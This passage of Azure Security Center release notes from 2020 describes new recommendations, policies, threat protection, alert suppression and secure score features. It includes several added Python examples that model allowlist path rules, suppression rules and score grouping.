  Policy ID: 501541f7-f7e7-4cd6-868c-4190fdad3ac9 
- Vulnerabilities should be remediated by a vulnerability assessment solution. Scope: BYOL. 
  Policy ID: 760a85ff-6162-42b3-8d70-698e268f648c 


From August 2020 


Recommendations: 
- A vulnerability assessment solution should be enabled on your virtual machines. Scope: Built-in + BYOL. 
  Key: ffff0522-1e88-47fc-8382-2a80ba848f5d 
- Vulnerabilities in your virtual machines should be remediated. Scope: Built-in + BYOL. 
  Key: 1195afff-c881-495e-9bc5-1486211ae03f 


Policies: 
- Vulnerability assessment should be enabled on virtual machines. Scope: Built-in + BYOL. 
  Policy ID: 501541f7-f7e7-4cd6-868c-4190fdad3ac9 


New AKS security policies added to ASC_default initiative — for use 
by private preview customers only 


To ensure that Kubernetes workloads are secure by default, Security Center is adding Kubernetes-level 
policies and hardening recommendations, including enforcement options with Kubernetes admission 
control. 


The early phase of this project includes a private preview and the addition of new (disabled by default) 
policies to the ASC_default initiative. 


You can safely ignore these policies and there will be no impact on your environment. If you'd like to 
enable them, sign up for the preview via the Microsoft Cloud Security Private Community and select 
from the following options: 


1. Single Preview — To join only this private preview. Explicitly mention "ASC Continuous Scan" as 
the preview you would like to join. 

2. Ongoing Program - To be added to this and future private previews. You'll need to complete a 
profile and privacy agreement. 


July 2020 


Updates in July include: 


- Vulnerability assessment for virtual machines is now available for non-marketplace images 
- Threat protection for Azure Storage expanded to include Azure Files and Azure Data Lake Storage 
Gen2 (preview) 
- Eight new recommendations to enable threat protection features 
- Container security improvements - faster registry scanning and refreshed documentation 
- Adaptive application controls updated with a new recommendation and support for wildcards in 
path rules 
- Six policies for SQL advanced data security deprecated 


Vulnerability assessment for virtual machines is now available for 
non-marketplace images 


When deploying a vulnerability assessment solution, Security Center previously performed a validation 
check before deploying. The check was to confirm a marketplace SKU of the destination virtual 
machine. 


From this update, the check has been removed and you can now deploy vulnerability assessment tools 
to 'custom' Windows and Linux machines. Custom images are ones that you've modified from the 
marketplace defaults. 


Although you can now deploy the integrated vulnerability assessment extension (powered by Qualys) 
on many more machines, support is only available if you're using an OS listed in Deploy the integrated 
vulnerability scanner to standard tier VMs. 


Learn more about the integrated vulnerability scanner for virtual machines (requires Azure Defender). 

Learn more about using your own privately-licensed vulnerability assessment solution from Qualys or 
Rapid7 in Deploying a partner vulnerability scanning solution. 


Threat protection for Azure Storage expanded to include Azure 
Files and Azure Data Lake Storage Gen2 (preview) 


Threat protection for Azure Storage detects potentially harmful activity on your Azure Storage 
accounts. Security Center displays alerts when it detects attempts to access or exploit your storage 
accounts. 


Your data can be protected whether it's stored as blob containers, file shares, or data lakes. 


Eight new recommendations to enable threat protection features 


Eight new recommendations have been added to provide a simple way to enable Azure Security 
Center's threat protection features for the following resource types: virtual machines, App Service 
plans, Azure SQL Database servers, SQL servers on machines, Azure Storage accounts, Azure 
Kubernetes Service clusters, Azure Container Registry registries, and Azure Key Vault vaults. 


The new recommendations are: 


- Advanced data security should be enabled on Azure SQL Database servers 
- Advanced data security should be enabled on SQL servers on machines 
- Advanced threat protection should be enabled on Azure App Service plans 
- Advanced threat protection should be enabled on Azure Container Registry registries 
- Advanced threat protection should be enabled on Azure Key Vault vaults 
- Advanced threat protection should be enabled on Azure Kubernetes Service clusters 
- Advanced threat protection should be enabled on Azure Storage accounts 
- Advanced threat protection should be enabled on virtual machines 


These new recommendations belong to the Enable Azure Defender security control. 


The recommendations also include the quick fix capability. 


Important 


Remediating any of these recommendations will result in charges for protecting the relevant 
resources. These charges will begin immediately if you have related resources in the current 
subscription, or in the future if you add such resources at a later date. 


For example, if you don't have any Azure Kubernetes Service clusters in your subscription and you 
enable the threat protection, no charges will be incurred. If, in the future, you add a cluster on the 
same subscription, it will automatically be protected and charges will begin at that time. 


Learn more about each of these in the security recommendations reference page. 


Learn more about threat protection in Azure Security Center. 


Container security improvements - faster registry scanning and 
refreshed documentation 

As part of the continuous investments in the container security domain, we are happy to share a 
significant performance improvement in Security Center's dynamic scans of container images stored in 
Azure Container Registry. Scans now typically complete in approximately two minutes. In some cases, 
they might take up to 15 minutes. 


To improve the clarity and guidance regarding Azure Security Center's container security capabilities, 
we've also refreshed the container security documentation pages. 


Learn more about Security Center's container security in the following articles: 

- Overview of Security Center's container security features 
- Details of the integration with Azure Container Registry 
- Details of the integration with Azure Kubernetes Service 
- How-to scan your registries and harden your Docker hosts 
- Security alerts from the threat protection features for Azure Kubernetes Service clusters 
- Security recommendations for containers 


Adaptive application controls updated with a new 
recommendation and support for wildcards in path rules 


The adaptive application controls feature has received two significant updates: 

- A new recommendation identifies potentially legitimate behavior that hasn't previously been 
allowed. The new recommendation, Allowlist rules in your adaptive application control policy 
should be updated, prompts you to add new rules to the existing policy to reduce the number of 
false positives in adaptive application controls violation alerts. 

- Path rules now support wildcards. From this update, you can configure allowed path rules using 
wildcards. There are two supported scenarios: 

  - Using a wildcard at the end of a path to allow all executables within this folder and sub-folders 
  - Using a wildcard in the middle of a path to enable a known executable name with a changing 
folder name (e.g. personal user folders with a known executable, automatically generated 
folder names, etc.). 


Learn more about adaptive application controls. 
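The two wildcard forms described above, as an added illustration that is not Security Center's own code: a small allowlist matcher that treats a trailing '*' as "this folder and all sub-folders" and a '*' in the middle of a path as exactly one folder name (both are this example's interpretation of the text); the rules and observed executions below are constructed.

```python
"""Matcher for adaptive application control allowlist path rules with wildcards.

Added example, not Security Center's own implementation. It models the two
wildcard scenarios from the July 2020 update:
  - a trailing '*' allows every executable in that folder and its sub-folders
  - a '*' in the middle of the path stands for exactly one folder name
    (e.g. a per-user folder) around a known executable name
A rule without a wildcard must match the full path exactly. Matching is
case-insensitive and accepts both backslash and slash separators (assumption).
"""
from __future__ import annotations

import re


def _segments(path: str) -> list[str]:
    """Split a path into folder/file names, normalised for comparison."""
    return [s.casefold() for s in re.split(r"[\\/]+", path.strip()) if s]


def path_rule_matches(rule: str, path: str) -> bool:
    """Return True if the executable at 'path' is allowed by 'rule'."""
    rule_parts, path_parts = _segments(rule), _segments(path)
    if not rule_parts or not path_parts:
        return False
    i = 0  # position in path_parts
    for pos, part in enumerate(rule_parts):
        if part == "*" and pos == len(rule_parts) - 1:
            # Trailing wildcard: the folder itself is not an executable, so at
            # least one further segment (the file name) must remain.
            return i < len(path_parts)
        if i >= len(path_parts):
            return False  # path ended before the rule did
        if part == "*":
            i += 1  # middle wildcard consumes exactly one folder name
        elif part == path_parts[i]:
            i += 1
        else:
            return False
    return i == len(path_parts)  # exact rule: nothing may be left over


def first_matching_rule(rules: list[str], path: str) -> str | None:
    """The allowlist rule that permits 'path', or None if it would be a violation."""
    for rule in rules:
        if path_rule_matches(rule, path):
            return rule
    return None


def violations(rules: list[str], executions: list[str]) -> list[str]:
    """Executions not covered by any rule; each would raise a violation alert."""
    return [p for p in executions if first_matching_rule(rules, p) is None]


# Constructed allowlist and observed executions for the demonstration.
SAMPLE_RULES = [
    r"C:\Program Files\Contoso\*",                    # trailing wildcard
    r"C:\Users\*\AppData\Local\Contoso\updater.exe",  # middle wildcard
    r"C:\Windows\System32\svchost.exe",               # exact path
    "/opt/contoso/*",
]
SAMPLE_EXECUTIONS = [
    r"C:\Program Files\Contoso\bin\service.exe",
    r"C:\Users\alice\AppData\Local\Contoso\updater.exe",
    r"C:\Users\alice\Downloads\AppData\Local\Contoso\updater.exe",  # one folder too deep
    r"c:\windows\system32\SVCHOST.EXE",
    r"C:\Windows\System32\svchost.exe.bak",
    "/opt/contoso/agent/collector",
    "/tmp/unknown-binary",
]

if __name__ == "__main__":
    for path in violations(SAMPLE_RULES, SAMPLE_EXECUTIONS):
        print("violation:", path)
```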


Six policies for SQL advanced data security deprecated 


Six policies related to advanced data security for SQL machines are being deprecated: 

- Advanced threat protection types should be set to 'All' in SQL managed instance advanced data 
security settings 
- Advanced threat protection types should be set to 'All' in SQL server advanced data security 
settings 
- Advanced data security settings for SQL managed instance should contain an email address to 
receive security alerts 
- Advanced data security settings for SQL server should contain an email address to receive 
security alerts 
- Email notifications to admins and subscription owners should be enabled in SQL managed 
instance advanced data security settings 
- Email notifications to admins and subscription owners should be enabled in SQL server advanced 
data security settings 


Learn more about built-in policies. 


June 2020 


Updates in June include: 


- Secure score API (preview) 
- Advanced data security for SQL machines (Azure, other clouds, and on-premises) (preview) 
- Two new recommendations to deploy the Log Analytics agent to Azure Arc machines (preview) 
- New policies to create continuous export and workflow automation configurations at scale 
- New recommendation for using NSGs to protect non-internet-facing virtual machines 
- New policies for enabling threat protection and advanced data security 


Secure score API (preview) 


You can now access your score via the secure score API (currently in preview). The API methods provide 
the flexibility to query the data and build your own reporting mechanism of your secure scores over 
time. For example, you can use the Secure Scores API to get the score for a specific subscription. In 
addition, you can use the Secure Score Controls API to list the security controls and the current score 
of your subscriptions. 


For examples of external tools made possible with the secure score API, see the secure score area of 
our GitHub community. 


Learn more about secure score and security controls in Azure Security Center. 


Advanced data security for SQL machines (Azure, other clouds, and 
on-premises) (preview) 


Azure Security Center's advanced data security for SQL machines now protects SQL Servers hosted in 
Azure, on other cloud environments, and even on-premises machines. This extends the protections for 
your Azure-native SQL Servers to fully support hybrid environments. 


Advanced data security provides vulnerability assessment and advanced threat protection for your SQL 
machines wherever they're located. 


Set up involves two steps: 


1. Deploying the Log Analytics agent to your SQL Server's host machine to provide the connection 
to your Azure account. 


2. Enabling the optional bundle in Security Center's pricing and settings page. 


Learn more about advanced data security for SQL machines. 


Two new recommendations to deploy the Log Analytics agent to 
Azure Arc machines (preview) 


Two new recommendations have been added to help deploy the Log Analytics Agent to your Azure Arc 
machines and ensure they're protected by Azure Security Center: 


- Log Analytics agent should be installed on your Windows-based Azure Arc machines (Preview) 
- Log Analytics agent should be installed on your Linux-based Azure Arc machines (Preview) 


These new recommendations will appear in the same four security controls as the existing (related) 
recommendation, Monitoring agent should be installed on your machines: remediate security 
configurations, apply adaptive application control, apply system updates, and enable endpoint 
protection. 


The recommendations also include the Quick fix capability to help speed up the deployment process. 

Learn more about these two new recommendations in the Compute and app recommendations table. 

Learn more about how Azure Security Center uses the agent in What is the Log Analytics agent?. 


Learn more about extensions for Azure Arc machines. 


New policies to create continuous export and workflow 
automation configurations at scale 


Automating your organization's monitoring and incident response processes can greatly reduce the 
time it takes to investigate and mitigate security incidents. 


To deploy your automation configurations across your organization, use these built-in 
'DeployIfNotExist' Azure policies to create and configure continuous export and workflow automation 
procedures. 


The policy definitions can be found in Azure Policy: 


- Goal: Continuous export to Event Hubs. 
  Policy: Deploy export to Event Hubs for Azure Security Center alerts and recommendations. 
  Policy ID: cdfcce10-4578-4ecd-9703-530938e4abcb 
- Goal: Continuous export to Log Analytics workspace. 
  Policy: Deploy export to Log Analytics workspace for Azure Security Center alerts and recommendations. 
  Policy ID: ffb6f416-7bd2-4488-8828-56585fef2be9 
- Goal: Workflow automation for security alerts. 
  Policy: Deploy Workflow Automation for Azure Security Center alerts. 
  Policy ID: f1525828-9a90-4fcf-be48-268cdd02361e 
- Goal: Workflow automation for security recommendations. 
  Policy: Deploy Workflow Automation for Azure Security Center recommendations. 
  Policy ID: 73d6ab6c-2475-4850-afd6-43795f3492ef 


Get started with workflow automation templates. 


Learn more about using the two export policies in Configure workflow automation at scale using the 
supplied policies and Set up a continuous export. 


New recommendation for using NSGs to protect non-internet- 
facing virtual machines 


The "implement security best practices" security control now includes the following new 
recommendation: 

- Non-internet-facing virtual machines should be protected with network security groups 


An existing recommendation, Internet-facing virtual machines should be protected with network 
security groups, didn't distinguish between internet-facing and non-internet facing VMs. For both, a 
high-severity recommendation was generated if a VM wasn't assigned to a network security group. 
This new recommendation separates the non-internet-facing machines to reduce the false positives 
and avoid unnecessary high-severity alerts. 


Learn more in the Network recommendations table. 


New policies for enabling threat protection and advanced data 
security 


The new policy definitions below were added to the ASC Default initiative and are designed to assist 
with enabling threat protection or advanced data security for the relevant resource types. 


The policy definitions can be found in Azure Policy: 


- Advanced data security should be enabled on Azure SQL Database servers. 
  Policy ID: 7fe3b40f-802b-4cdd-8bd4-fd799c948cc2 
- Advanced data security should be enabled on SQL servers on machines. 
  Policy ID: 6581d072-105e-4418-827f-bd446d56421b 
- Advanced threat protection should be enabled on Azure Storage accounts. 
  Policy ID: 308fbb08-4ab8-4e67-9b29-592e93fb94fa 
- Advanced threat protection should be enabled on Azure Key Vault vaults. 
  Policy ID: 0e6763cc-5078-4e64-889d-ff4d9a839047 
- Advanced threat protection should be enabled on Azure App Service plans. 
  Policy ID: 2913021d-f2fd-4f3d-b958-22354e2bdbcb 
- Advanced threat protection should be enabled on Azure Container Registry registries. 
  Policy ID: c25d9a16-bc35-4e15-a7e5-9db606bf9ed4 
- Advanced threat protection should be enabled on Azure Kubernetes Service clusters. 
  Policy ID: 523b5cd1-3e23-492f-a539-13118b6d1e3a 
- Advanced threat protection should be enabled on Virtual Machines. 
  Policy ID: 4da35fc9-c9e7-4960-aec9-797fe7d9051d 


Learn more about Threat protection in Azure Security Center. 


May 2020 


Updates in May include: 


- Alert suppression rules (preview) 
- Virtual machine vulnerability assessment is now generally available 
- Changes to just-in-time (JIT) virtual machine (VM) access 
- Custom recommendations have been moved to a separate security control 
- Toggle added to view recommendations in controls or as a flat list 
- Expanded security control "Implement security best practices" 
- Custom policies with custom metadata are now generally available 
- Crash dump analysis capabilities migrating to fileless attack detection 


Alert suppression rules (preview) 


This new feature (currently in preview) helps reduce alert fatigue. Use rules to automatically hide alerts 
that are known to be innocuous or related to normal activities in your organization. This lets you focus 
on the most relevant threats. 


Alerts that match your enabled suppression rules will still be generated, but their state will be set to 
dismissed. You can see the state in the Azure portal or however you access your Security Center 
security alerts. 


Suppression rules define the criteria for which alerts should be automatically dismissed. Typically, you'd 
use a suppression rule to: 


- suppress alerts that you've identified as false positives 
- suppress alerts that are being triggered too often to be useful 


Learn more about suppressing alerts from Azure Security Center's threat protection. 
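The dismissed-but-still-generated behaviour described above, as an added example that is not Security Center's code: a simplified model of suppression rules (alert type, expiry, a documented reason, and scope conditions combined with AND) applied to a batch of alerts. The alert types, entity field names and resource names are constructed for the example, and the rule shape only loosely follows the alertsSuppressionRules resource.

```python
"""Simplified model of Security Center alert suppression rules.

Added example, not Security Center's own code. It shows the behaviour the
May 2020 note describes: an alert that matches an enabled suppression rule
is still generated, but its state becomes Dismissed instead of Active, so it
stays visible to anyone querying alerts by state. Alert types, entity field
names and resource names below are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone


@dataclass
class Alert:
    alert_type: str
    severity: str
    resource_id: str
    entities: dict[str, str] = field(default_factory=dict)  # e.g. {"host.name": "web01"}
    state: str = "Active"
    suppressed_by: str | None = None


@dataclass
class ScopeCondition:
    field_name: str   # key in Alert.entities
    operator: str     # "in" (exact match, any value) or "contains" (substring, any value)
    values: list[str]


@dataclass
class SuppressionRule:
    name: str
    alert_type: str
    reason: str                        # documented justification, e.g. "FalsePositive"
    expires_utc: datetime | None = None
    enabled: bool = True
    conditions: list[ScopeCondition] = field(default_factory=list)  # all must hold


def _condition_holds(cond: ScopeCondition, alert: Alert) -> bool:
    value = alert.entities.get(cond.field_name)
    if value is None:
        return False  # a missing entity field never satisfies a condition
    text = value.casefold()
    if cond.operator == "in":
        return text in {v.casefold() for v in cond.values}
    if cond.operator == "contains":
        return any(v.casefold() in text for v in cond.values)
    raise ValueError(f"unsupported operator: {cond.operator!r}")


def rule_matches(rule: SuppressionRule, alert: Alert, now: datetime) -> bool:
    if not rule.enabled or rule.alert_type != alert.alert_type:
        return False
    if rule.expires_utc is not None and now >= rule.expires_utc:
        return False  # an expired rule stops dismissing alerts
    return all(_condition_holds(c, alert) for c in rule.conditions)


def apply_suppression(alerts: list[Alert], rules: list[SuppressionRule],
                      now: datetime) -> list[Alert]:
    """Mark matching alerts Dismissed; never drop an alert from the list."""
    for alert in alerts:
        for rule in rules:
            if rule_matches(rule, alert, now):
                alert.state, alert.suppressed_by = "Dismissed", rule.name
                break
    return alerts


def sample_run(now: datetime | None = None) -> list[Alert]:
    """Constructed alerts and rules; returns the alerts after suppression."""
    now = now or datetime(2020, 5, 15, tzinfo=timezone.utc)
    rules = [
        SuppressionRule("scanner-fp", "Example.PortScan", "FalsePositive",
                        expires_utc=now + timedelta(days=30),
                        conditions=[ScopeCondition("host.name", "in", ["scan01", "scan02"])]),
        SuppressionRule("old-rule", "Example.BruteForce", "Other",
                        expires_utc=now - timedelta(days=1)),  # already expired
    ]
    alerts = [
        Alert("Example.PortScan", "Low", "vm-scan01", {"host.name": "scan01"}),
        Alert("Example.PortScan", "Low", "vm-web02", {"host.name": "web02"}),
        Alert("Example.BruteForce", "High", "vm-web02", {"host.name": "web02"}),
    ]
    return apply_suppression(alerts, rules, now)


if __name__ == "__main__":
    for a in sample_run():
        print(f"{a.alert_type:<20} {a.state:<10} {a.suppressed_by or ''}")
```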


Virtual machine vulnerability assessment is now generally available 


Security Center's standard tier now includes an integrated vulnerability assessment for virtual machines 
for no additional fee. This extension is powered by Qualys but reports its findings directly back to 
Security Center. You don't need a Qualys license or even a Qualys account - everything's handled 
seamlessly inside Security Center. 


The new solution can continuously scan your virtual machines to find vulnerabilities and present the 
findings in Security Center. 


To deploy the solution, use the new security recommendation: 
"Enable the built-in vulnerability assessment solution on virtual machines (powered by Qualys)" 


Learn more about Security Center's integrated vulnerability assessment for virtual machines. 


Changes to just-in-time (JIT) virtual machine (VM) access 


Security Center includes an optional feature to protect the management ports of your VMs. This 
provides a defense against the most common form of brute force attacks. 


This update brings the following changes to this feature: 


• The recommendation that advises you to enable JIT on a VM has been renamed. Formerly "Just-in-time 
network access control should be applied on virtual machines", it's now "Management ports of virtual 
machines should be protected with just-in-time network access control". 


• The recommendation is triggered only if there are open management ports. 


Learn more about the JIT access feature. 


Custom recommendations have been moved to a separate security control 


One security control introduced with the enhanced secure score was "Implement security best 
practices". Any custom recommendations created for your subscriptions were automatically placed in 
that control. 


To make it easier to find your custom recommendations, we've moved them into a dedicated security 
control, "Custom recommendations". This control has no impact on your secure score. 


Learn more about security controls in Enhanced secure score (preview) in Azure Security Center. 


Toggle added to view recommendations in controls or as a flat list 


Security controls are logical groups of related security recommendations. They reflect your vulnerable 
attack surfaces. A control is a set of security recommendations, with instructions that help you 
implement those recommendations. 


To immediately see how well your organization is securing each individual attack surface, review the 
scores for each security control. 


By default, your recommendations are shown in the security controls. From this update, you can also 
display them as a list. To view them as a simple list sorted by the health status of the affected resources, 
use the new toggle 'Group by controls'. The toggle is above the list in the portal. 


The security controls - and this toggle - are part of the new secure score experience. Remember to 
send us your feedback from within the portal. 


Learn more about security controls in Enhanced secure score (preview) in Azure Security Center. 
[Screenshot: the secure score page with "Group by controls" switched on. Caption text from the 
page: "Each security control below represents a security risk you should mitigate. Address the 
recommendations in each control, focusing on the controls worth the most points. To get the max 
score, fix all recommendations for all resources in a control."] 

Controls                                      Potential score increase   Unhealthy resources 
Remediate vulnerabilities                     +9% (6 points)             37 of 50 resources 
Enable encryption at rest                     +5% (3 points)             28 of 51 resources 
Secure management ports                       +5% (3 points)             11 of 39 resources 
Manage access and permissions                 +4% (2 points)             3 of 5 resources 
Protect applications against DDoS attacks     +3% (2 points)             2 of 29 resources 
Restrict unauthorized network access          +2% (1 point)              12 of 51 resources 
Enable endpoint protection                    +2% (1 point)              23 of 44 resources 
Remediate security configurations             +2% (1 point)              12 of 48 resources 
Apply system updates                          +2% (1 point)              8 of 50 resources 
Enable auditing and logging                   +1% (1 point)              43 of 56 resources 
Apply data classification                     +1% (1 point)              4 of 12 resources 
Apply adaptive application control            +1% (0 points)             5 of 39 resources 

(The "Resource Health" bar column of the screenshot is not recoverable as text.) 
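To make the two views and the per-control scoring concrete, the following added example (not Security Center code) builds both the grouped view and the flat list from constructed assessment results and computes a control's points. The recommendation names are ones quoted on this page; the resource names, the per-control maximum points (other than the 6 points shown for "Remediate vulnerabilities") and the formula "current points = max points × healthy resources / total resources" are assumptions made here.

```python
from collections import defaultdict

# Constructed assessment results: (recommendation, security control, resource, status).
RESULTS = [
    ("Management ports of virtual machines should be protected with just-in-time network access control",
     "Secure management ports", "vm-web01", "Unhealthy"),
    ("Management ports of virtual machines should be protected with just-in-time network access control",
     "Secure management ports", "vm-db01", "Healthy"),
    ("Management ports of virtual machines should be protected with just-in-time network access control",
     "Secure management ports", "vm-app01", "Unhealthy"),
    ("Internet-facing virtual machines should be protected with network security groups",
     "Secure management ports", "vm-web01", "Healthy"),
    ("Internet-facing virtual machines should be protected with network security groups",
     "Secure management ports", "vm-db01", "Healthy"),
    ("Internet-facing virtual machines should be protected with network security groups",
     "Secure management ports", "vm-app01", "Healthy"),
    ("Vulnerabilities in your virtual machines should be remediated",
     "Remediate vulnerabilities", "vm-web01", "Unhealthy"),
    ("Vulnerabilities in your virtual machines should be remediated",
     "Remediate vulnerabilities", "vm-db01", "Unhealthy"),
    ("Vulnerabilities in your virtual machines should be remediated",
     "Remediate vulnerabilities", "vm-app01", "Healthy"),
    ("Vulnerabilities in Azure Container Registry images should be remediated",
     "Remediate vulnerabilities", "acr-prod", "Healthy"),
    ("A maximum of 3 owners should be designated for your subscription",
     "Implement security best practices", "sub-prod", "Unhealthy"),
    ("Custom: every VM should carry an 'owner' tag",
     "Custom recommendations", "vm-web01", "Unhealthy"),
]

# Maximum points per control. "Remediate vulnerabilities" = 6 is the value shown on the
# page; the others are constructed. Best-practice and custom controls carry 0 points.
MAX_POINTS = {
    "Secure management ports": 8,
    "Remediate vulnerabilities": 6,
    "Implement security best practices": 0,
    "Custom recommendations": 0,
}


def recommendation_health(results):
    """Per recommendation: (control, unhealthy resources, total resources)."""
    stats = {}
    for rec, control, _resource, status in results:
        control_name, unhealthy, total = stats.get(rec, (control, 0, 0))
        stats[rec] = (control_name, unhealthy + (status == "Unhealthy"), total + 1)
    return stats


def group_by_controls(results):
    """The default view: recommendations grouped under their security control."""
    grouped = defaultdict(list)
    for rec, (control, unhealthy, total) in recommendation_health(results).items():
        grouped[control].append((rec, unhealthy, total))
    return dict(grouped)


def flat_list(results):
    """The "Group by controls: Off" view: a plain list, worst health status first."""
    rows = [(rec, unhealthy, total)
            for rec, (_c, unhealthy, total) in recommendation_health(results).items()]
    return sorted(rows, key=lambda r: (-r[1], r[0]))


def control_score(results, control):
    """Current points = max points * healthy resources / total resources for the control.
    A resource counts as healthy for a control only if every recommendation in that
    control is healthy for it (assumed formula, see lead-in)."""
    status = defaultdict(lambda: True)
    for _rec, ctrl, resource, st in results:
        if ctrl == control:
            status[resource] = status[resource] and st == "Healthy"
    if not status:
        return 0.0
    healthy = sum(1 for ok in status.values() if ok)
    return MAX_POINTS[control] * healthy / len(status)


def secure_score(results):
    """Overall score as a percentage: earned points over the maximum available."""
    earned = sum(control_score(results, c) for c in MAX_POINTS)
    return round(100 * earned / sum(MAX_POINTS.values()), 2)
```

The point the page makes about "fix all recommendations for all resources in a control" falls out of `control_score`: vm-web01 is healthy for the NSG recommendation but unhealthy for JIT, so it still counts against "Secure management ports", and the two zero-point controls change nothing in `secure_score` no matter how many unhealthy resources they hold.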


Expanded security control "Implement security best practices" 


One security control introduced with the enhanced secure score is "Implement security best practices". 


When a recommendation is in this control, it doesn't impact the secure score. 


With this update, three recommendations have moved out of the controls in which they were originally 
placed, and into this best practices control. We've taken this step because we've determined that the 
risk of these three recommendations is lower than was initially thought. In addition, two new 
recommendations have been introduced and added to this control. 


The three recommendations that moved are: 


• MFA should be enabled on accounts with read permissions on your subscription (originally in 
the "Enable MFA" control) 

• External accounts with read permissions should be removed from your subscription (originally 
in the "Manage access and permissions" control) 

• A maximum of 3 owners should be designated for your subscription (originally in the "Manage 
access and permissions" control) 


The two new recommendations added to the control are: 


• Guest configuration extension should be installed on Windows virtual machines (Preview) - 
Using Azure Policy Guest Configuration provides visibility inside virtual machines to server and 
application settings (Windows only). 

• Windows Defender Exploit Guard should be enabled on your machines (Preview) - Windows 
Defender Exploit Guard leverages the Azure Policy Guest Configuration agent. Exploit Guard has 
four components that are designed to lock down devices against a wide variety of attack vectors 
and block behaviors commonly used in malware attacks while enabling enterprises to balance 
their security risk and productivity requirements (Windows only). 


Learn more about Windows Defender Exploit Guard in Create and deploy an Exploit Guard policy. 


Learn more about security controls in Enhanced secure score (preview). 


Custom policies with custom metadata are now generally available 


Custom policies are now part of the Security Center recommendations experience, secure score, and 
the regulatory compliance standards dashboard. This feature is now generally available and allows you 
to extend your organization's security assessment coverage in Security Center. 


Create a custom initiative in Azure Policy, add policies to it and onboard it to Azure Security Center, 
and visualize it as recommendations. 


We've now also added the option to edit the custom recommendation metadata. Metadata options 
include severity, remediation steps, threats information, and more. 


Learn more about enhancing your custom recommendations with detailed information. 


Crash dump analysis capabilities migrating to fileless attack detection 


We are integrating the Windows crash dump analysis (CDA) detection capabilities into fileless attack 
detection. Fileless attack detection analytics brings improved versions of the following security alerts 
for Windows machines: Code injection discovered, Masquerading Windows Module Detected, Shell 
code discovered, and Suspicious code segment detected. 


Some of the benefits of this transition: 


• Proactive and timely malware detection - The CDA approach involved waiting for a crash to 
occur and then running analysis to find malicious artifacts. Using fileless attack detection brings 
proactive identification of in-memory threats while they are running. 

• Enriched alerts - The security alerts from fileless attack detection include enrichments that aren't 
available from CDA, such as the active network connections information. 

• Alert aggregation - When CDA detected multiple attack patterns within a single crash dump, it 
triggered multiple security alerts. Fileless attack detection combines all of the identified attack 
patterns from the same process into a single alert, removing the need to correlate multiple alerts. 

• Reduced requirements on your Log Analytics workspace - Crash dumps containing potentially 
sensitive data will no longer be uploaded to your Log Analytics workspace. 


April 2020 


Updates in April include: 


• Dynamic compliance packages are now generally available 
• Identity recommendations now included in Azure Security Center free tier 


Dynamic compliance packages are now generally available 


The Azure Security Center regulatory compliance dashboard now includes dynamic compliance 
packages (now generally available) to track additional industry and regulatory standards. 


Dynamic compliance packages can be added to your subscription or management group from the 
Security Center security policy page. When you've onboarded a standard or benchmark, the standard 
appears in your regulatory compliance dashboard with all associated compliance data mapped as 
assessments. A summary report for any of the standards that have been onboarded will be available to 
download. 


Now, you can add standards such as: 


• NIST SP 800-53 R4 

• SWIFT CSP CSCF-v2020 

• UK Official and UK NHS 

• Canada Federal PBMM 

• Azure CIS 1.1.0 (new) (which is a more complete representation of Azure CIS 1.1.0) 


In addition, we've recently added the Azure Security Benchmark, the Microsoft-authored Azure-specific 
guidelines for security and compliance best practices based on common compliance frameworks. 
Additional standards will be supported in the dashboard as they become available. 


Learn more about customizing the set of standards in your regulatory compliance dashboard. 


Identity recommendations now included in Azure Security Center free tier 


Security recommendations for identity and access on the Azure Security Center free tier are now 
generally available. This is part of the effort to make the cloud security posture management (CSPM) 
features free. Until now, these recommendations were only available on the standard pricing tier. 


Examples of identity and access recommendations include: 


• "Multi-factor authentication should be enabled on accounts with owner permissions on your 
subscription." 

• "A maximum of three owners should be designated for your subscription." 

• "Deprecated accounts should be removed from your subscription." 


If you have subscriptions on the free pricing tier, their secure scores will be impacted by this change 
because they were never assessed for their identity and access security. 


Learn more about identity and access recommendations. 


Learn more about Managing multi-factor authentication (MFA) enforcement on your subscriptions. 


March 2020 


Updates in March include: 


• Workflow automation is now generally available 

• Integration of Azure Security Center with Windows Admin Center 

• Protection for Azure Kubernetes Service 

• Improved just-in-time experience 

• Two security recommendations for web applications deprecated 


Workflow automation is now generally available 


The workflow automation feature of Azure Security Center is now generally available. Use it to 
automatically trigger Logic Apps on security alerts and recommendations. In addition, manual triggers 
are available for alerts and all recommendations that have the quick fix option available. 


Every security program includes multiple workflows for incident response. These processes might 
include notifying relevant stakeholders, launching a change management process, and applying 
specific remediation steps. Security experts recommend that you automate as many steps of those 
procedures as you can. Automation reduces overhead and can improve your security by ensuring the 
process steps are done quickly, consistently, and according to your predefined requirements. 


For more information about the automatic and manual Security Center capabilities for running your 
workflows, see workflow automation. 


Learn more about creating Logic Apps. 


Integration of Azure Security Center with Windows Admin Center 


It's now possible to move your on-premises Windows servers from the Windows Admin Center directly 
to the Azure Security Center. Security Center then becomes your single pane of glass to view security 
information for all your Windows Admin Center resources, including on-premises servers, virtual 
machines, and additional PaaS workloads. 


After moving a server from Windows Admin Center to Azure Security Center, you'll be able to: 


• View security alerts and recommendations in the Security Center extension of the Windows 
Admin Center. 

• View the security posture and retrieve additional detailed information of your Windows Admin 
Center managed servers in the Security Center within the Azure portal (or via an API). 


Learn more about how to integrate Azure Security Center with Windows Admin Center. 


Protection for Azure Kubernetes Service 


Azure Security Center is expanding its container security features to protect Azure Kubernetes Service 
(AKS). 


The popular, open-source platform Kubernetes has been adopted so widely that it's now an industry 
standard for container orchestration. Despite this widespread implementation, there's still a lack of 
understanding regarding how to secure a Kubernetes environment. Defending the attack surfaces of a 
containerized application requires expertise to ensure the infrastructure is configured securely and 
constantly monitored for potential threats. 


The Security Center defense includes: 


• Discovery and visibility - Continuous discovery of managed AKS instances within the 
subscriptions registered to Security Center. 

• Security recommendations - Actionable recommendations to help you comply with security 
best-practices for AKS. These recommendations are included in your secure score to ensure 
they're viewed as a part of your organization's security posture. An example of an AKS-related 
recommendation you might see is "Role-based access control should be used to restrict access to 
a Kubernetes service cluster". 

• Threat protection - Through continuous analysis of your AKS deployment, Security Center alerts 
you to threats and malicious activity detected at the host and AKS cluster level. 


Learn more about Azure Kubernetes Services' integration with Security Center. 


Learn more about the container security features in Security Center. 


Improved just-in-time experience 


The features, operation, and UI for Azure Security Center's just-in-time tools that secure your 
management ports have been enhanced as follows: 


• Justification field - When requesting access to a virtual machine (VM) through the just-in-time 
page of the Azure portal, a new optional field is available to enter a justification for the request. 
Information entered into this field can be tracked in the activity log. 

• Automatic cleanup of redundant just-in-time (JIT) rules - Whenever you update a JIT policy, a 
